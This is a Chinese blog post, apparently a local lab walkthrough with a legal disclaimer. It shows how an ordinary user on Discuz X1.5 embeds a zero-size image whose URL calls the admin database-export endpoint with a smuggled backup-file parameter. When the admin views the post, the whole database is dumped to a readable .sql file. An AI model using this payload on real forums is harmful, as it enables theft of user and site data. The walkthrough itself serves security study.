免责声明
本博客文章仅供教育和研究目的使用。本文中提到的所有信息和技术均基于公开来源和合法获取的知识。本文不鼓励或支持任何非法活动,包括但不限于未经授权访问计算机系统、网络或数据。
作者对于读者使用本文中的信息所导致的任何直接或间接后果不承担任何责任。包括但不限于因使用本文所述技术而可能导致的法律诉讼、财产损失、隐私泄露或其他任何形式的责任。
在进行任何渗透测试或安全研究之前,请确保您已获得所有必要的授权,并遵守适用的法律和道德准则。未经授权的安全测试可能违反法律,并可能导致严重的法律后果。
本文中的内容仅供参考,不应被视为专业建议。在进行任何安全相关活动之前,建议咨询具有相应资质的专业人士。
下载Discuz源码,将源码放在网站根目录下
访问http://192.168.153.40:90/Discuz_X1.5_SC_GBK/upload/install页面
修改数据库密码为自己的数据库密码,创建admin用户
安装完成返回主页,点击注册,注册完成之后会自动登录
使用其他浏览器再次访问该网站,并使用admin用户登录
登录进去后点击管理中心
进入管理中心需要使用admin用户密码登录,我们点击备份数据,提交
然后我们使用普通用户发帖留言
选择添加图片,在图片地址中输入以下链接,并将宽和高设置为0,点击发帖(记得修改为自己的ip)
http://192.168.153.40:90//discuz_x1.5_sc_gbk/upload/uc_server/admin.php?m=db&a=operate&t=export&appid=1&backupdir=xxxx%26backupfilename%3Daaaa
然后我们使用管理员查看此留言
可以看到留言没有什么问题
然后我们查看根目录下Discuz_X1.5_SC_GBK\upload\data文件夹中可以发现已经自动生成了一个xxxx的文件夹了
我们点进去就可以看到有一个aaaa-1.sql数据库文件
然后我们使用普通用户访问该文件就可以看到所有的数据库配置命令,这就相当于拿到了数据库所有信息
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
